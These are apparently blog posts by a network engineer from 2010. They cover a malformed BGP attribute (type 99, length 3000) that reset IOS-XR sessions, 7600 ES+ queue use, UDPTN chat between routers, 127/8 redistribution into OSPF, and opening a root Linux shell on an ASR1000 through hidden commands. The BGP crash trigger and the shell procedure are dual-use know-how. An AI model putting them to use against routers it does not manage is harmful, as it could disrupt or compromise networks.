Input from: test-bgp.txt
Output to: test-bgp.pcap
Generate dummy Ethernet header: Protocol: 0x800
Generate dummy IP header: Protocol: 6
Generate dummy TCP header: Source port: 179. Dest port: 1025
Start new packet
Wrote packet of 280 bytes at 0

-------------------------
Read 1 potential packet, wrote 1 packet


Now, if you load this pcap file into Wireshark, you'll get the following output:



As you can clearly see, there was an unknown attribute (with Type Code 99) inserted into the UPDATE message with the following characteristics:

Flags: Optional, Transitive, Partial, Extended Length
Type code : 99
Length : 3000 bytes

The length of the BGP UPDATE message has been defined as 280 in the BGP header, having 253 as total path attribute length, so something went clearly wrong.

This unknown attribute should have a length of 3000 bytes as defined in its length attribute, but it was only 184 bytes if you count the octets from where zeros start (after 0x0BB8) till the end. From this number comes 188 (184 + 4 for Flags/TypeCode/Length), the number that's included in the initial error message.

So, the length of the unknown attribute has been defined as 3000 into the packet, which is 0x0BB8 in hex. If you somehow remove the first octet, then it becomes 0xB8, which is 184 in decimal. If you add the 4 extra bytes (Flags, Type code, Length), then it becomes 188 and the sum of all attributes becomes 253, which is the one shown in the packet too.

In reverse order, if you calculate the supposed total path attribute length in case all attributes were correct, then it should be 3069, which is 0x0BFD in hex. If again you somehow remove the first octet, it becomes 0xFD (253).

I guess, in general anything larger than 0xFF (255) would have caused the same issue too.

Cisco issued an advisory after some hours, providing fixes for its IOS-XR software.


Regarding the behavior of BGP, the relevant RFC (4271) says the following, so everything was expected:

NOTIFICATION messages are sent in response to errors or special conditions. If a connection encounters an error condition, a NOTIFICATION message is sent and the connection is closed.
...
A NOTIFICATION message is sent when an error condition is detected. The BGP connection is closed immediately after it is sent.
...
Error checking of an UPDATE message begins by examining the path attributes. If the Withdrawn Routes Length or Total Attribute Length is too large (i.e., if Withdrawn Routes Length + Total Attribute Length + 23 exceeds the message Length), then the Error Subcode MUST be set to Malformed Attribute List.


There is also a lot of discussion happening regarding the notification and reset thing after this event and draft-ietf-idr-optional-transitive seems quite interesting.

Links
http://mailman.nanog.org/pipermail/nanog/2010-August/024837.html
http://www.networkworld.com/news/2010/082710-research-experiment-disrupts-internet-for.html
http://www.renesys.com/blog/2010/08/house-of-cards.shtml
https://labs.ripe.net/Members/erik/ripe-ncc-and-duke-university-bgp-experiment/

Question
Is there a chance by creating "dummy" and large attributes to cause memory issues on BGP routers?

Sunday, April 18, 2010

How to find queue utilisation on 7600/ES+ cards

Cisco usually provides various technical characteristics about their products, but you never get the details you need. One big mystery are the ES/ES+ cards on the 7600 platform. We've been using the ES+ cards for quite a long time and i was trying to get a comparison with the ES+T ones, which come in lower prices. The most worrying fact (regarding a specific project's needs) was a difference in QoS (especially egress) :

76-ES+T-20G : (16, 8, 4) (Level 4 Queues, Level 3 Shaper, Level 2 Shaper) queues per port
7600-ES+20G3CXL : 64,000 ingress queues & 64,000 egress queues

This seems like a big difference, but it may not be relevant to your case, unless you know how to count them easily.

An easy way to start experimenting is the "sh tech-support" command, which includes a lot of information. A variant of this is "sh hw-module slot x tech-support", if you're interested in a specific module. Beware of bug CSCta88917 if you try this. Bug toolkit doesn't say anything useful, but after we opened a new SR, we had to rma the whole module, because according to the tac engineer the crash was due to a faulty sensor (any idea why GOLD didn't catch it?).

Anyway, the command that displays the queue usage is "show platform hardware qos np x queue resources" and this is the output from a 7600-ES+20G3CXL card in slot 9 of a 7600:


7600#rem com mod 9 show platform hardware qos np 0 queue resources

np tm level groups entity
----------------------------------------------
0 0 L4 4096/15 32768/34
0 0 L3 256/13 4096/15
0 0 L2 8/11 256/13
0 0 L1 32/10 32/10
----------------------------------------------
0 1 L4 4096/14 32768/51
0 1 L3 256/10 4096/14
0 1 L2 8/5 256/6
0 1 L1 32/5 32/5
----------------------------------------------
0 2 L4 4096/6 32768/16
0 2 L3 256/6 4096/6
0 2 L2 8/5 256/5
0 2 L1 32/5 32/5

7600#rem com mod 9 show platform hardware qos np 1 queue resources

np tm level groups entity
----------------------------------------------
1 0 L4 4096/15 32768/34
1 0 L3 256/13 4096/15
1 0 L2 8/11 256/13
1 0 L1 32/10 32/10
----------------------------------------------
1 1 L4 4096/5 32768/10
1 1 L3 256/5 4096/5
1 1 L2 8/5 256/5
1 1 L1 32/5 32/5
----------------------------------------------
1 2 L4 4096/5 32768/10
1 2 L3 256/5 4096/5
1 2 L2 8/5 256/5
1 2 L1 32/5 32/5


You can see the queues per NP and per level. 7600-ES+20G3CXL has two NPs, each one controlling 10 ports. Each NP has 3 tm; tm 0 in each NP doesn't seem to be updated by the configuration changes (any clue?). The ones that interest you are tm 1 and tm 2 entity values, which control 5 ports each.

Summarizing it up :

NP 0, tm 1 : ports 1-5
NP 0, tm 2 : ports 6-10
NP 1, tm 1 : ports 11-15
NP 1, tm 2 : ports 16-20

According to the above outputs, there are 32768+32768 entities per NP, so i don't know if the official number of 64000 queues is totally correct. i.e. can you use all of them on the first 5 ports? 7600/ES+ QoS documentation provides some info, but it's not very clear.

These are the values you start with:


level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


If you have a single level policy, then you only reserve queues from L4 level.
If you have a hierarchical policy with 2 levels, then you reserve queues from L4 and L3 levels.
If you have a hierarchical policy with 3 levels, then you reserve queues from L4, L3 and L2 levels.

Service instance, port-channel service instance, and Layer 3 subinterface support 2-level policy-map:
- parent => class-default
--- child => user defined classes

Main interface supports 3-level policy-map:
- grand-parent => class-default
--- parent => user defined classes
----- child => user defined classes


Examples

If you have the following 2-level egress H-QoS applied on a main interface


7600#sh policy-map int gi9/6 | i Class
Class-map: class-default (match-any)
Class-map: 1A-CLASS (match-all)
Class-map: 1B-CLASS (match-all)
Class-map: 1C-CLASS (match-all)
Class-map: 1D-CLASS (match-all)
Class-map: 1E-CLASS (match-all)
Class-map: class-default (match-any)


then the output becomes...

Before:

level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


After:

level entity
-------------------
L4 32768/16
L3 4096/6
L2 256/5
L1 32/5


which means you're using :

1 L3 queue
6 L4 queues


If you have the following 3-level egress H-QoS applied on a main interface


7600#sh policy-map int gi9/1 | i Class
Class-map: class-default (match-any)
Class-map: 1A-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1B-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1C-CLASS (match-all)
Class-map: 2A-CLASS (match-all)
Class-map: 2B-CLASS (match-all)
Class-map: 2C-CLASS (match-all)
Class-map: 2D-CLASS (match-all)
Class-map: class-default (match-any)
Class-map: 1D-CLASS (match-all)
Class-map: class-default (match-any)


then the output becomes...

Before:

level entity
-------------------
L4 32768/10
L3 4096/5
L2 256/5
L1 32/5


After:

level entity
-------------------
L4 32768/27
L3 4096/10
L2 256/6
L1 32/5


which means you're using :

1 L2 queue
5 L3 queues
17 L4 queues


Notes

1) Does anyone have any explanation about the 2 extra L4 queues from the last example? If you count the leaf classes, you'll find they are 15. I guess the last 2 classes (that have no child) reserve an extra "hidden" child queue, probably in order to make their depth equal to the others'.

2)
In IOS hierarchical levels are represented as follows and current support is up to five levels:

• Physical or main interface
• Subinterface or logical layer
• Grandparent class
• Parent class
• Child class

A policy map with 2 levels has :
• 3 levels of hierarchy when attached on the main interface
• 4 levels of hierarchy when attached on a subinterface

A policy map with 3 levels has :
• 4 levels of hierarchy when attached on the main interface
• 5 levels of hierarchy when attached on a subinterface

Saturday, February 13, 2010

Realtime chat between Cisco routers

You might probably know that it's possible to send messages from one vty line to another on a single Cisco router.


R1#send ?
* All tty lines
<0-17> Send a message to a specific line
aux Auxiliary line
console Primary terminal line
log Logging destinations
qdm Send a message to QDM client
vty Virtual terminal
xsm Send a message to XSM client



R1#send 1
Enter message, end with CTRL/Z; abort with CTRL/C:
Hi
^Z
Send message? [confirm]

R1#

***
***
*** Message from tty0 to tty1:
***
Hi


The last few days i'm trying to find a way to send automatically some custom-made udp packets from a Cisco router to a specific destination, in order to emulate the heartbeat mechanism of SixXS. Tcl seemed like a nice option, but as far as i know its implementation in Cisco IOS doesn't support extensions (Tcl doesn't have a builtin command for udp channels, so we must use an extension to enable it).

Asynchronous Serial Traffic Over User Datagram Protocol or UDPTN (UDP Telnet) is an IOS feature that provides the ability to encapsulate asynchronous data into UDP packets, and then unreliably transmit this data without needing to establish a connection with a receiving device. UDPTN is similar to Telnet in that both are used to transmit data, but UDPTN is unique in that it does not require that a connection be established with a receiving device.

Its usage is quite simple. You just have to enable udptn as an output transport under your vtys and then open a connection to the remote end.


R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#line vty 0 15
R1(config-line)#transport output ssh udptn
R1(config-line)#^Z
R1#

R2#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R2(config)#line vty 0 15
R2(config-line)#transport output ssh udptn
R2(config-line)#^Z
R2#


You have various options regarding the role of each device, but usually one end is transmitting and the other end is receiving. If you need 2-way communication, then you need to enable both directions. You can use any port above 1024 or just the default 57.


R1#udptn 1.1.1.2 3740 /transmit /receive
Trying 1.1.1.2, 3740 ... Open

R2#udptn 1.1.1.1 3740 /transmit /receive
Trying 1.1.1.1, 3740 ... Open


It becomes more interesting if you send packets to a multicast/broadcast address, so everyone having an open connection there will see the data.

There are some annoying things, like that you can't see locally the entered chars, or that you get chars on top of the previous chars (you can use spaces in order to clear the line), but you can't expect the full thing.


R2#udptn 1.1.1.1 3740 /transmit /receive
Trying 1.1.1.1, 3740 ... Open
How are you doing today? ! This was typed on R1

R1#udptn 1.1.1.2 3740 /transmit /receive
Trying 1.1.1.2, 3740 ... Open
Fine, thanks ! This was typed on R2


Voila! You just made it possible to have a chat with your friend at a remote Cisco router! If you want to stop the session, you can use Ctrl-Shift-6 + x and then enter the "disconnect" command.

There are 2 terminal options that can be configured under source vtys and can change the behavior of text output:

dispatch-timeout 10000 : This one makes the packets be transmitted every 10 secs
dispatch-character 13 : This one causes the current number of typed chars to be sent after you press Enter (ASCII 13). By default each char is sent immediately.

Note : Because of its ability to send raw UDP datagrams that might conflict with other protocols, UDPTN has an implicit access list that only allows UDPTN connections to UDP port 57 (default) or UDP ports greater than 1024.

If only now i could find a way to send such messages automatically, i would probably solve my initial issue. EEM doesn't provide a mechanism to feed chars into a remote session and the Tcl "typeahead/exec" solution makes the process get stuck (and i can't find a way to clear it). Any idea how to send Ctrl-Shift-6 + x?

Monday, February 8, 2010

Should IPC's 127.0.0.0/8 be redistributed by OSPF?

I have a tac case open for over 5 months, regarding the default redistribution of 127/8 when "service internal" is configured on a C10000 router. Keep in mind that i'm redistributing all connected routes to OSPF.

Specifically:


C10k-33SB7>sh ip route 127.0.0.0
Routing entry for 127.0.0.0/8, 2 known subnets
Attached (2 connections)
Variably subnetted with 2 masks
Redistributing via ospf x
C 127.0.0.0/8 is directly connected, Ethernet0/0/0
L 127.0.0.254/32 is directly connected, Ethernet0/0/0

C10k-33SB7>sh ip ospf database self-originate | i 127.0.0.0
127.0.0.0 x.x.x.x 1590 0x80001C02 0x00FA81 0


If i understand correctly, 127/8 is used by the IPC (Inter-Process Communication) channel on the C10k. According to Cisco:

"Ethernet 0/0/0 is assigned to the backplane. It is not a user configurable interface. The reason for this is to provide a loopback interface for testing purposes. You cannot configure it or make it go away. There will be no impact on routing since all addresses in the 127/8 are illegal for routing purposes."

Of course, the reason i have to carry all those non-routable prefixes in my OSPF database is of no concern to Cisco.


another-router>sh ip ospf database | i 127.0.0.0
127.0.0.0 x.x.x.x 601 0x80000932 0x00BEC7 0
127.0.0.0 x.x.x.x 347 0x80001C02 0x00FA81 0
127.0.0.0 x.x.x.x 288 0x80000918 0x00FB7B 0
127.0.0.0 x.x.x.x 526 0x800026EE 0x00E9EE 0
127.0.0.0 x.x.x.x 1972 0x80000917 0x00A8DE 0
127.0.0.0 x.x.x.x 110 0x80002563 0x00D622 0
....


Cisco proposes to simply filter them using access-lists/prefix-lists, but i cannot understand why i have to filter something that shouldn't be there in any case. After all, i'm already filtering customer routes where i would expect such routes.

Some months ago, Cisco had issued a security advisory about the IPC being externally reachable. Both bugs (CSCsg15342, CSCsh29217) referenced in that advisory include exactly the same info, but i don't know what was actually fixed.

IPC processing needs to be more robust
Cisco 10000, uBR10012 and uBR7200 series devices use a User Datagram Protocol (UDP) based Inter-Process Communication (IPC) channel that is externally reachable. An attacker could exploit this vulnerability to cause a denial of service (DoS) condition on affected devices. No other platforms are affected.


Probably they fixed the reachable part and messed up the announce part, because in previous IOS there wasn't such an issue :


C10k-31SB14>sh ip route 127.0.0.0
Routing entry for 127.0.0.0/8
Known via "connected", distance 0, metric 0 (connected, via interface)
Redistributing via ospf x
Routing Descriptor Blocks:
* directly connected, via Ethernet0/0/0
Route metric is 0, traffic share count is 1

C10k-31SB14>sh ip ospf database self-originate | i 127.0.0.0
C10k-31SB14>


I have heard tens of excuses about "service internal", but i haven't heard anything that mandates this silly 127/8 redistribution. If anyone knows the actual reason behind this, i would be very glad to hear it.

Monday, February 1, 2010

Get your hands dirty with Linux on an ASR1000

Most of you will know that ASR1000 is running IOS XE on top of a Linux kernel. Actually, more than one IOS XE packages run on top of more than one Linux kernels (all three control CPUs (RP, FECP, IOCP) run a Linux kernel).

Here is how you can have some fun with it.

WARNING : Everything below this line is being done at your own risk. You probably don't want to experiment on a production network and you'd better use this functionality only under supervision of Cisco Support.

First you have to configure "service internal" in order to enable some advanced -hidden- commands:


ASR1k#conf t
Enter configuration commands, one per line. End with CNTL/Z.
ASR1k(config)#service internal
ASR1k(config)#^Z
ASR1k#


Then you must enable shell access by configuring it globally :


ASR1k#conf t
Enter configuration commands, one per line. End with CNTL/Z.
ASR1k(config)#platform ?
ipsec Platform specific ipsec command
multicast Configure multicast
reload Platform specific reload command
shell Control platform shell access command availability

ASR1k(config)#platform shell
ASR1k(config)#^Z
ASR1k#


And now you're ready to request shell access. You can open a shell to any of the control CPUs (active or standby), but i'll stick to the RP.


ASR1k#request platform software system shell rp act
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y

2010/02/01 10:15:31 : Shell access was granted to user ; Trace file: , /harddisk/tracelogs/system_shell_R0.log.20100201101531
**********************************************************************
Activity within this shell can jeopardize the functioning
of the system.
Use this functionality only under supervision of Cisco Support.

Session will be logged to:
harddisk:tracelogs/system_shell_R0.log.20100201101531
**********************************************************************


Here are some interesting outputs :


[ASR1k_RP_0:/]$ uname -a
Linux ASR1k_RP_0 2.6.18.8 #8 SMP Wed Nov 4 23:10:18 PST 2009 x86_64 x86_64 x86_64 GNU/Linux

[ASR1k_RP_0:/]$ pwd
/
[ASr1k_RP_0:/]$ ls -al
total 56
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 .
drwxr-xr-x 19 904735 25 0 Jan 22 12:44 ..
-rw-r--r-- 1 root root 0 Jan 19 06:58 .autofsck
-rw-r--r-- 1 904735 25 684 Jan 19 06:57 .pkgset
drwxr-xr-x 2 root root 0 Jan 19 06:57 auto
drwxr-xr-x 2 904735 25 0 Jan 19 06:57 bin
drwxr-xr-x 6 root root 4096 Feb 1 10:17 bootflash
-rwxr-xr-x 1 904735 25 43688 Jan 19 06:57 common
lrwxrwxrwx 1 root root 10 Jan 19 06:57 config -> /bootflash
drwxrwxrwt 6 root root 13540 Jan 19 06:58 dev
lrwxrwxrwx 1 root root 10 Jan 19 06:57 disk0 -> /vol/disk0
drwxr-xr-x 15 904735 25 0 Jan 19 06:58 etc
lrwxrwxrwx 1 root root 13 Jan 19 06:57 harddisk -> /misc/scratch
lrwxrwxrwx 1 root root 33 Jan 19 06:57 issu -> /tmp/sw/rp/0/0/rp_base/mount/issu
drwxr-xr-x 3 904735 25 0 Jan 19 06:57 lib
lrwxrwxrwx 1 root root 34 Jan 19 06:57 lib64 -> /tmp/sw/rp/0/0/rp_base/mount/lib64
drwxr-xr-x 2 root root 0 Jan 19 06:57 misc
drwxr-xr-x 3 root root 0 Jan 19 06:57 mnt
lrwxrwxrwx 1 root root 15 Jan 19 06:57 obfl -> /vol/bootflash4
dr-xr-xr-x 147 root root 0 Jan 19 06:57 proc
-rwxr-xr-x 1 904735 25 1077 Jan 19 06:57 rommon_to_env
drwx------ 2 root root 0 Jan 21 21:29 root
drwxr-xr-x 2 904735 25 0 Jan 19 06:57 sbin
drwxr-xr-x 11 root root 0 Jan 19 06:57 sys
-rw-r--r-- 1 root root 0 Jan 22 12:44 test
drwxr-xr-x 2 root root 0 Jan 19 06:58 tftp
drwxrwxrwt 17 root root 540 Feb 1 10:17 tmp
lrwxrwxrwx 1 root root 10 Jan 19 06:57 usb0 -> /misc/usb0
lrwxrwxrwx 1 root root 10 Jan 19 06:57 usb1 -> /misc/usb1
drwxr-xr-x 7 904735 25 0 Jan 19 06:57 usr
drwxr-xr-x 10 root root 0 Jan 19 06:58 var
drwxr-xr-x 3 root root 0 Jan 22 11:39 vol

[ASR1k_RP_0:/]$ set
BASH=/bin/bash
BASH_ARGC=()
BASH_ARGV=()
BASH_LINENO=()
BASH_SOURCE=()
BASH_VERSINFO=([0]="3" [1]="2" [2]="25" [3]="1" [4]="release" [5]="i686-pc-linux-gnu")
BASH_VERSION='3.2.25(1)-release'
BINOS_ACCESS_RUN_MODE=0
BINOS_BASE_DIR=/tmp/rp
BINOS_BAY_LOCAL=0
BINOS_BIN_DIR=/usr/binos/bin/rp
BINOS_BTRACE_FILE_PATH=/tmp/rp/trace
BINOS_BTRACE_LEVEL=err
BINOS_CHASFS_ROOT=/tmp/rp/chasfs
BINOS_CHASSIS_XML=/usr/binos/conf/chassis.xml
BINOS_CMRP_IMAGE_ROOT=/tftp
BINOS_CMRP_TFTP_PORT=69
BINOS_CONF_DIR=/usr/binos/conf
BINOS_DUAL_IOS_CAPABLE=0
BINOS_DUAL_IOS_REQUESTED=0
BINOS_FRU_LOCAL=BINOS_FRU_RP
BINOS_LIPC_PATH=/tmp/rp/lipc
BINOS_NVRAM_DIR=/config
BINOS_RAMFS_DIR=/tmp
BINOS_SLOT_LOCAL=0
BINOS_TDLDB_PATH=/tmp/rp/tdldb
BINOS_USER_NAME=
BINOS_USER_TMPDIR=/tmp/tmppub
BINOS_USER_TTY='vty 0'
BINOS_USER_UI_CLIENT=ios
COLUMNS=84
CPP_BIN_DIR=/usr/cpp/bin/rp
CPP_CONF_DIR=/usr/cpp/conf
CPP_STARTUP_FILE=/tmp/rp/cpp_startup_complete
CPP_STARTUP_WAIT=120
DIRSTACK=()
EUID=0
GROUPS=()
HISTFILE=/root/.bash_history
HISTFILESIZE=500
HISTSIZE=500
HOSTNAME=ASR1k_RP_0
HOSTTYPE=i686
IFS=$' \t\n'
LINES=40
LOGDIR=/tmp/rp
LOGFILE=/tmp/rp/pvp_log
MACHTYPE=i686-pc-linux-gnu
MAILCHECK=60
MQIPC_PREFIX_NAME=
NETIO_NETMAP=/usr/binos/bin/rp/NETMAP
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/tmp/sw/rp/0/0/rp_daemons/mount/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/conf:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/sbin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/binos/bin:/tmp/sw/rp/0/0/rp_daemons/mount/usr/cpp/bin:/usr/bin:/bin:/sbin:/usr/binos/conf:/usr/binos/bin
PIPESTATUS=([0]="127")
PPID=28601
PS1='[\h:\w]$ '
PS2='> '
PS4='+ '
PWD=/
REAL_MGMTE_DEV=eth2
REMOTEHOST=192.168.0.2
ROMMON_BOOT='bootflash:asr1000rp2-advipservicesk9.02.04.02.122-33.XND2.bin,1;bootflash:asr1000rp2-advipservicesk9.02.04.01.122-33.XND1.bin,1;'
ROMMON_BOOTLDR=
ROMMON_BOOT_PARAM='root=/dev/ram rw console=ttyS1,9600 max_loop=64'
ROMMON_BSI=0
ROMMON_CONFIG_FILE=
ROMMON_ISSU_BOOTED_IMAGE=
ROMMON_NT_K=0:0:0:0
ROMMON_PS1='rommon _ _ '
ROMMON_RANDOM_NUM=1737496254
ROMMON_RET_2_RCALTS=1263876910
ROMMON_RET_2_RTS='06:55:10 EET Tue Jan 19 2010'
SHELL=/bin/bash
SHELLOPTS=braceexpand:emacs:hashall:histexpand:history:interactive-comments:monitor
SHLVL=5
SW_FRU_BASE=/tmp/sw/rp/0/0/rp_daemons/mount
TERM=xterm
UID=0
USER=binos
_=setenv

[ASR1k_RP_0:/]$ ls /bin
arch dmesg ipcalc netstat sleep true
basename doexec kill nice sort tsort
bash du ln nohup split tty
cat echo login od start-stop-daemon umount
chgrp egrep logname ping stat uname
chmod env ls printenv stty uniq
chown expr lsmod ps sync uptime
chroot false mcp_pkg_wrap pwd tail usleep
comm fgrep md5sum readlink tar vi
cp gdbserver mkdir rm tcsh wc
cut get_me_bash mkfifo rmdir tee who
date grep mknod sed test whoami
dd head mktemp seq touch x86_64-gdbserver
df hostname mount sh tr yes
dirname id mv sha1sum tracepath

[ASR1k_RP_0:/]$ ls /sbin
agetty e2label ifconfig mkdosfs portmap swapon
arp fdisk ifdown mke2fs poweroff sysctl
badblocks fsck ifup mkfs reboot syslogd
blkid fsck.ext2 init mkfs.ext2 resize2fs telinit
blockdev fsck.ext3 initlog mkfs.ext3 rmmod tune2fs
cfdisk fsck.msdos insmod mkfs.msdos route udevcontrol
chvrf fsck.vfat ip mkfs.vfat runlevel udevd
consoletype fuser iptables mkswap service udevsettle
ctrlaltdel genhostid iptables-restore modinfo setsysfont udevtrigger
depmod getkey iptables-save modprobe sfdisk
dosfsck halt killall5 nameif shutdown
dumpe2fs hdparm klogd pidof start_udev
e2image hwclock lsof pivot_root sulogin


Check the running processes (iosd is the IOS XE one):


[ASR1k_RP_0:/]$ ps -elf
F S UID PID PPID C PRI NI ADDR SZ WCHAN STIME TTY TIME CMD
4 S root 1 0 0 80 0 - 434 - Jan19 ? 00:00:01 init [3]
1 S root 2 1 0 -40 0 - 0 migrat Jan19 ? 00:00:00 [migration/0]
1 S root 3 1 0 99 19 - 0 ksofti Jan19 ? 00:00:01 [ksoftirqd/0]
5 S root 4 1 0 -40 0 - 0 watchd Jan19 ? 00:00:00 [watchdog/0]
1 S root 5 1 0 -40 0 - 0 migrat Jan19 ? 00:00:00 [migration/1]
1 S root 6 1 0 99 19 - 0 ksofti Jan19 ? 00:00:00 [ksoftirqd/1]
5 S root 7 1 0 -40 0 - 0 watchd Jan19 ? 00:00:00 [watchdog/1]
5 S root 8 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [events/0]
1 S root 9 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [events/1]
1 S root 10 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [khelper]
1 S root 11 1 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kthread]
1 S root 15 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/0]
1 S root 16 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kblockd/1]
1 S root 17 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [kacpid]
1 S root 138 11 0 75 -5 - 0 hub_th Jan19 ? 00:00:00 [khubd]
1 S root 202 11 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 203 11 0 80 0 - 0 pdflus Jan19 ? 00:00:00 [pdflush]
1 S root 204 11 0 75 -5 - 0 kswapd Jan19 ? 00:00:00 [kswapd0]
1 S root 205 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/0]
1 S root 206 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/1]
1 S root 818 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata/0]
1 S root 819 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata/1]
1 S root 820 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [ata_aux]
1 S root 822 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_0]
1 S root 823 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_1]
1 S root 824 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_2]
1 S root 825 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_3]
1 S root 860 11 0 75 -5 - 0 scsi_e Jan19 ? 00:00:00 [scsi_eh_4]
1 S root 861 11 0 75 -5 - 0 - Jan19 ? 00:00:01 [usb-storage]
1 S root 1765 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop0]
5 S bin 1896 1 0 80 0 - 428 117466 Jan19 ? 00:00:04 portmap
1 S root 1950 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop1]
1 S root 1988 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop2]
1 S root 2026 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop3]
1 S root 2064 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop4]
1 S root 2174 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop5]
1 S root 2212 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop6]
1 S root 2286 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop7]
5 S root 11175 1 0 76 -4 - 410 - Jan19 ? 00:00:00 /sbin/udevd -d
0 S root 12396 1 0 80 0 - 613 - Jan19 ttyS1 00:00:00 /bin/bash /etc/auxinit.sh --
5 S root 12513 1 0 80 0 - 431 171798 Jan19 ? 00:00:00 /usr/sbin/automount --timeout=60 /vol file /etc/auto.vol
5 S root 12543 1 0 80 0 - 513 - Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
5 S root 12545 1 0 80 0 - 514 - Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd_telnetd.pid -f /etc/xinetd_telnetd.conf
5 S root 12574 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12575 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12576 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12577 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12578 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12579 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12580 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12581 1 0 80 0 - 0 - Jan19 ? 00:00:00 [nfsd]
1 S root 12582 1 0 80 0 - 0 - Jan19 ? 00:00:00 [lockd]
1 S root 12583 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [rpciod/0]
1 S root 12584 11 0 75 -5 - 0 worker Jan19 ? 00:00:00 [rpciod/1]
1 S root 12586 1 0 80 0 - 421 - Jan19 ? 00:03:39 rpc.mountd
1 S root 12667 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:00:09 [lsmpi-refill]
1 S root 12668 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:30:30 [lsmpi-xmit]
1 S root 12669 1 0 70 -10 - 0 lsmpi_ Jan19 ? 00:29:09 [lsmpi-rx]
1 S root 13029 11 0 75 -5 - 0 184466 Jan19 ? 00:00:00 [ddr_err_monitor]
1 S root 13052 1 0 80 0 - 0 mtd_bl Jan19 ? 00:00:00 [mtdblockd]
5 S root 18573 1 0 80 0 - 383 syslog Jan19 ? 00:00:00 /sbin/klogd -2
4 S root 18585 1 0 80 0 - 866 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pvp.sh
0 S root 18622 1 0 80 0 - 1119 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f pvp -p /tmp/rp/trace/fifo/pvp_sh%rp_0_0_18585_fifo
0 S root 18822 18585 0 80 0 - 407 - Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /tmp/rp/pvp/control /tmp/rp/pvp/process /tmp/rp/chasfs/pman
4 S root 18899 18585 0 69 -11 - 853 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/rp/0/0/rp_base/mount/usr/binos/conf/pman.sh
0 S root 18969 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/btrace_rotate_sh_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_18899_fifo
4 S root 19093 18585 0 69 -11 - 847 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
4 S root 19168 18899 0 80 0 - 776 wait Jan19 ? 00:03:33 /bin/bash /tmp/sw/mount/asr1000rp2-rpbase.02.04.02.122-33.XND2.pkg/usr/binos/conf/btrace_rotate.sh -f rp -s /tmp/rp/trace/stage -w /tmp/rp/trace -n 25
0 S root 19261 1 0 80 0 - 1121 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/rp/trace/cmand_pmanlog -p /tmp/rp/trace/fifo/pman_sh%rp_0_0_19093_fifo
4 S root 19308 18585 0 69 -11 - 848 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pman.sh
0 S root 19314 1 0 80 0 - 1120 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f btrace_rotate_sh -p /tmp/rp/trace/fifo/btrace_rotate_sh%rp_0_0_19168_fifo
